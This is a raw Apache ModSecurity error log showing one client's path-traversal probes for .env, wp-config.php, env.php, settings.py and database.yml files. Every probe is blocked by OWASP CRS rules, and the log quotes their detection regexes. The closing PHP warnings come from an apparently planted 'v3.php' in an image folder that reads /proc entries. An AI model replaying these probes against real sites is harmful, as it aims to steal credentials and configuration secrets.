[Tue May 12 04:40:24.560172 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTGNr1yOh9TvizeziQLgAAAFY"], referer: https://tchatbooster.com/images../../.env.local
[Tue May 12 04:40:25.021152 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTGNr1yOh9TvizeziQLgAAAFY"], referer: https://tchatbooster.com/images../../.env.local
[Tue May 12 04:40:25.051297 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTGTue9Sp-pIv_Bb610wAAAUk"]
[Tue May 12 04:40:25.051381 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTGTue9Sp-pIv_Bb610wAAAUk"]
[Tue May 12 04:40:25.051550 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTGTue9Sp-pIv_Bb610wAAAUk"]
[Tue May 12 04:40:25.501453 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTGTue9Sp-pIv_Bb610wAAAUk"]
[Tue May 12 04:40:25.520841 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTGdr1yOh9TvizeziQLwAAAFY"], referer: https://tchatbooster.com/images../../.env.production
[Tue May 12 04:40:25.521056 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTGdr1yOh9TvizeziQLwAAAFY"], referer: https://tchatbooster.com/images../../.env.production
[Tue May 12 04:40:26.000794 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTGdr1yOh9TvizeziQLwAAAFY"], referer: https://tchatbooster.com/images../../.env.production
[Tue May 12 04:40:26.029391 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTGjue9Sp-pIv_Bb611QAAAUk"]
[Tue May 12 04:40:26.029465 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTGjue9Sp-pIv_Bb611QAAAUk"]
[Tue May 12 04:40:26.029637 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTGjue9Sp-pIv_Bb611QAAAUk"]
[Tue May 12 04:40:26.468969 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTGjue9Sp-pIv_Bb611QAAAUk"]
[Tue May 12 04:40:26.487698 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTGtr1yOh9TvizeziQMQAAAFY"], referer: https://tchatbooster.com/images../../wp-config.php
[Tue May 12 04:40:26.487950 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTGtr1yOh9TvizeziQMQAAAFY"], referer: https://tchatbooster.com/images../../wp-config.php
[Tue May 12 04:40:26.967776 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTGtr1yOh9TvizeziQMQAAAFY"], referer: https://tchatbooster.com/images../../wp-config.php
[Tue May 12 04:40:27.004489 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKTGzue9Sp-pIv_Bb611wAAAUk"]
[Tue May 12 04:40:27.004711 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKTGzue9Sp-pIv_Bb611wAAAUk"]
[Tue May 12 04:40:27.464319 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTGzue9Sp-pIv_Bb611wAAAUk"]
[Tue May 12 04:40:28.037826 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKTHDue9Sp-pIv_Bb612gAAAUk"]
[Tue May 12 04:40:28.038072 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKTHDue9Sp-pIv_Bb612gAAAUk"]
[Tue May 12 04:40:28.507225 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTHDue9Sp-pIv_Bb612gAAAUk"]
[Tue May 12 04:40:28.966762 2026] [security2:error] [pid 1825287:tid 1825311] [client 124.156.206.78:53624] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/cafetiere/"] [unique_id "agKTHAgpmE1yW0glLdgfrAAAAMY"]
[Tue May 12 04:40:29.041554 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKTHTue9Sp-pIv_Bb613QAAAUk"]
[Tue May 12 04:40:29.041776 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKTHTue9Sp-pIv_Bb613QAAAUk"]
[Tue May 12 04:40:29.496133 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTHTue9Sp-pIv_Bb613QAAAUk"]
[Tue May 12 04:40:30.033822 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTHjue9Sp-pIv_Bb614AAAAUk"]
[Tue May 12 04:40:30.033932 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTHjue9Sp-pIv_Bb614AAAAUk"]
[Tue May 12 04:40:30.034107 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTHjue9Sp-pIv_Bb614AAAAUk"]
[Tue May 12 04:40:30.478218 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTHjue9Sp-pIv_Bb614AAAAUk"]
[Tue May 12 04:40:30.496951 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTHtr1yOh9TvizeziQOgAAAFY"], referer: https://tchatbooster.com/files../../.env
[Tue May 12 04:40:30.497189 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTHtr1yOh9TvizeziQOgAAAFY"], referer: https://tchatbooster.com/files../../.env
[Tue May 12 04:40:30.976234 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTHtr1yOh9TvizeziQOgAAAFY"], referer: https://tchatbooster.com/files../../.env
[Tue May 12 04:40:31.005099 2026] [core:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] AH10244: invalid URI path (/files../../../.env)
[Tue May 12 04:40:31.476957 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTH9r1yOh9TvizeziQOwAAAFY"], referer: https://tchatbooster.com/files../../../.env
[Tue May 12 04:40:31.477180 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTH9r1yOh9TvizeziQOwAAAFY"], referer: https://tchatbooster.com/files../../../.env
PHP Warning:  filesize(): stat failed for /proc/1022/task/1022/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1022/task/1022/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1022/task/1022/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
